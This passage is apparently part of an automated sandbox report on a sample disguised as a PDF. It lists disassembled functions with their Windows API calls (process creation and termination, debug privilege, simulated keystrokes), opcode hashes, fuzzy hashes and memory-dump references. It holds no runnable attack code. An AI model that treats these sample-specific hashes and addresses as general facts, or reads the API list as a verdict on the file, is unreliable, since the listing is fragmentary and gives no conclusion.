                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: ff90dd4528c555edcac39dd63afdc2fbd5c37f68fde382b08f91a1324bcacfe9
                                                            • Instruction ID: 71cd32c06c1abb80e834f5d1e8d1ff97a49134799be981ede0c40ca878925539
                                                            • Opcode Fuzzy Hash: ff90dd4528c555edcac39dd63afdc2fbd5c37f68fde382b08f91a1324bcacfe9
                                                            • Instruction Fuzzy Hash: 63519D70204304AFD704DF24C895FAA7BF5FB98310F00862DF6598B2A2CB349999DB52
                                                            Function 00168F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0017F910), ref: 0016903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0017F910), ref: 00169071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001691EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00169215
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 4b84ffe2a6da9ec3f2bceb42f6772c3aecb5ec2733e7c3cf0ffcfb6323db4fe6
                                                            • Instruction ID: c045357629bd0741f3ce3632b5c036f8c1db572a9924b38d0bdd725908819db8
                                                            • Opcode Fuzzy Hash: 4b84ffe2a6da9ec3f2bceb42f6772c3aecb5ec2733e7c3cf0ffcfb6323db4fe6
                                                            • Instruction Fuzzy Hash: 29F10971A00109EFDB04DFA4CC88EAEB7B9FF49315F208499F915AB251DB31AE56CB50
                                                            Function 0016F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0016F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0016FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0016FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0016FE36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 9093322a308581f9eb9a242adf55858bb28ab0e395004726b1299aeb40f33b8c
                                                            • Instruction ID: 883d6c49f7fe956ff706081db15180d7e76bdd058a1ec43af37e58d948928c07
                                                            • Opcode Fuzzy Hash: 9093322a308581f9eb9a242adf55858bb28ab0e395004726b1299aeb40f33b8c
                                                            • Instruction Fuzzy Hash: 6FE1D331604301DFC724EF24D881B6ABBE1BF89354F15896DF9998B2A2CB31DC56CB52
                                                            Function 00154F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0
                                                              • Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00154FE2
                                                            • _wcscmp.LIBCMT ref: 00154FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00155017
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: e8439b6c65da35094d7d7568651da98e7d80a5b379b62866b7e1990d5c56a710
                                                            • Instruction ID: c7b0db21408f94521c84e25f84f7a4330b87d35c2e6b8ffea9a249356fb2109a
                                                            • Opcode Fuzzy Hash: e8439b6c65da35094d7d7568651da98e7d80a5b379b62866b7e1990d5c56a710
                                                            • Instruction Fuzzy Hash: C95185B20087859BC724DB94DC819DFB3ECAF94341F00092EF699C7192EF74A18C8766
                                                            Function 001788B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0017896E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: bb6a85cbb316b2ded4d4ddd101bdf9ded97b317c672dc4dfbc9568522bf833bc
                                                            • Instruction ID: 26f0e24daec22e4d3a659f95aaa072df3c232fb8ff7c9246100b02f66944962a
                                                            • Opcode Fuzzy Hash: bb6a85cbb316b2ded4d4ddd101bdf9ded97b317c672dc4dfbc9568522bf833bc
                                                            • Instruction Fuzzy Hash: 6B518530580208BFDF249F28CC8DBAA7B75BB15314F608526F61DE75A1DF71A9C09B52
                                                            Function 000F2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0012C547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012C569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0012C581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0012C59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0012C5C0
                                                            • DestroyIcon.USER32(00000000), ref: 0012C5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0012C5EC
                                                            • DestroyIcon.USER32(?), ref: 0012C5FB
                                                              • Part of subcall function 0017A71E: DeleteObject.GDI32(00000000), ref: 0017A757
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 212373b78c4a334e65ebaa72542a2758818c7a79aec002abb2cf4832b212b567
                                                            • Instruction ID: d8bb93e58758fb3cec5fc6a331ed4dd0bbe3886a6cce8172f8f589f29f174d5d
                                                            • Opcode Fuzzy Hash: 212373b78c4a334e65ebaa72542a2758818c7a79aec002abb2cf4832b212b567
                                                            • Instruction Fuzzy Hash: 30514870A00209EFDB24DF25DC45BBE37B5EB58710F104528FA06A7AA0DB70ED91EB90
                                                            Function 00149B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0014AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0014AE77
                                                              • Part of subcall function 0014AE57: GetCurrentThreadId.KERNEL32 ref: 0014AE7E
                                                              • Part of subcall function 0014AE57: AttachThreadInput.USER32(00000000,?,00149B65,?,00000001), ref: 0014AE85
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149B70
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00149B8D
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00149B90
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149B99
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00149BB7
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00149BBA
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149BC3
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00149BDA
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00149BDD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 9357ae3b4c2e7709bd7d86cb5fe56b55725e240cf4ac8ccbc2d9d5190509d502
                                                            • Instruction ID: 2e9ab12f36990cda9a8aa303cd60a5d3efb7a02fc6e41edd01472ad140fa8402
                                                            • Opcode Fuzzy Hash: 9357ae3b4c2e7709bd7d86cb5fe56b55725e240cf4ac8ccbc2d9d5190509d502
                                                            • Instruction Fuzzy Hash: 6B11E5B1550618BEF6106B60DC49F6B3B2DDF4C761F510429F258AB4A0CAF25C91DAB4
                                                            Function 00148E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00148A84,00000B00,?,?), ref: 00148E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00148A84,00000B00,?,?), ref: 00148E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E43
                                                            • GetCurrentProcess.KERNEL32(00148A84,00000000,?,00148A84,00000B00,?,?), ref: 00148E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,00148E74,00000000,00000000,00000000), ref: 00148E68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: d29db5bdc0585176619ab170f8467ed6bf8423ffc4508cf5eeea000e56624539
                                                            • Instruction ID: 0d30fd88b4ec45f94b07b97651678a0347816813b83fc6d15d3aad4e7503f3b5
                                                            • Opcode Fuzzy Hash: d29db5bdc0585176619ab170f8467ed6bf8423ffc4508cf5eeea000e56624539
                                                            • Instruction Fuzzy Hash: 6501B6B5240308FFE710ABA5DC4DF6B3BACEB89711F404425FA09DB6A1CA709881CB30
                                                            Function 00169428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: 45dc89fde686ca3fc05f4e65e077c6e9ba06a419c06f5e14423daa0109ca1866
                                                            • Instruction ID: 7cc604023a67cd612101e1b7b7c047c24d36ae1e533d0fc846647c92b1dfb8c8
                                                            • Opcode Fuzzy Hash: 45dc89fde686ca3fc05f4e65e077c6e9ba06a419c06f5e14423daa0109ca1866
                                                            • Instruction Fuzzy Hash: B3919E71A00319ABDF25DFA5CC48FAEBBB8EF45710F10815AF919AB280D7709955CFA0
                                                            Function 00169A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00147652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
                                                              • Part of subcall function 00147652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
                                                              • Part of subcall function 00147652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
                                                              • Part of subcall function 00147652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00169B1B
                                                            • _memset.LIBCMT ref: 00169B28
                                                            • _memset.LIBCMT ref: 00169C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00169C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00169CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00169CF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: c0fd15d48314efa5102bdcb7bda82cf424feff977a3d4a39534203953c32e155
                                                            • Instruction ID: 8603aca330d19fc2a3ca866acfe3bf7e2b1d7cd21a9e7933c04ed23796199f43
                                                            • Opcode Fuzzy Hash: c0fd15d48314efa5102bdcb7bda82cf424feff977a3d4a39534203953c32e155
                                                            • Instruction Fuzzy Hash: 61913871D00219ABDF10DFA4DC80AEEBBB9BF08310F20416AF519A7291DB705A55CFA1
                                                            Function 00176FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00177093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 001770A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001770C1
                                                            • _wcscat.LIBCMT ref: 0017711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00177133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00177161
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 8665c9d424db0122fd868bb1eddb969cf7ac2c42b84b21267a2a206ab7070cdb
                                                            • Instruction ID: bdc1412b49195607f0c9828ca7b3a42058e151abcb707b5c57d1604fd8bbf373
                                                            • Opcode Fuzzy Hash: 8665c9d424db0122fd868bb1eddb969cf7ac2c42b84b21267a2a206ab7070cdb
                                                            • Instruction Fuzzy Hash: D041C271A44308AFDB219FA4CC85BEE77B8EF08350F10442AF548E72D2D7719D858B60
                                                            Function 0016EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00153E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00153EB6
                                                              • Part of subcall function 00153E91: Process32FirstW.KERNEL32(00000000,?), ref: 00153EC4
                                                              • Part of subcall function 00153E91: CloseHandle.KERNEL32(00000000), ref: 00153F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECB8
                                                            • GetLastError.KERNEL32 ref: 0016ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0016ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0016ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0016EDB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
                                                            • Instruction ID: dbc4965ced60eab5edfc57e030e979e96df1a4c6a4ca7fef69a35e1c3f3d8188
                                                            • Opcode Fuzzy Hash: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
                                                            • Instruction Fuzzy Hash: 8741A9712042019FDB24EF24CC96FBEB7A1AF94714F18801CF9469B2D2DBB5A855CB92
                                                            Function 00153226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 001532C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
                                                            • Instruction ID: a5ed30e2f80fe43f132d9d67e20feb67c8cad1c4755c443b9031ab42f085b955
                                                            • Opcode Fuzzy Hash: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
                                                            • Instruction Fuzzy Hash: 2911053520C74AFAE7095A54DC42DAAB39CEF1A3B1F20002AFD30AB181E7A15B8545B5
                                                            Function 00154534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0015454E
                                                            • LoadStringW.USER32(00000000), ref: 00154555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0015456B
                                                            • LoadStringW.USER32(00000000), ref: 00154572
                                                            • _wprintf.LIBCMT ref: 00154598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001545B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00154593
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
                                                            • Instruction ID: c6e46cc59ec55f711d8c53c1b05b23d7704d07fd8f7fd3793c1c5aa533a5f23d
                                                            • Opcode Fuzzy Hash: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
                                                            • Instruction Fuzzy Hash: 64014FF6900208BFE750A7A09D89EE7777CE708301F4005A9BB49E6451EA749EC68B70
                                                            Function 0017D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0017D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0017D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0017D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0017DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0017DA24
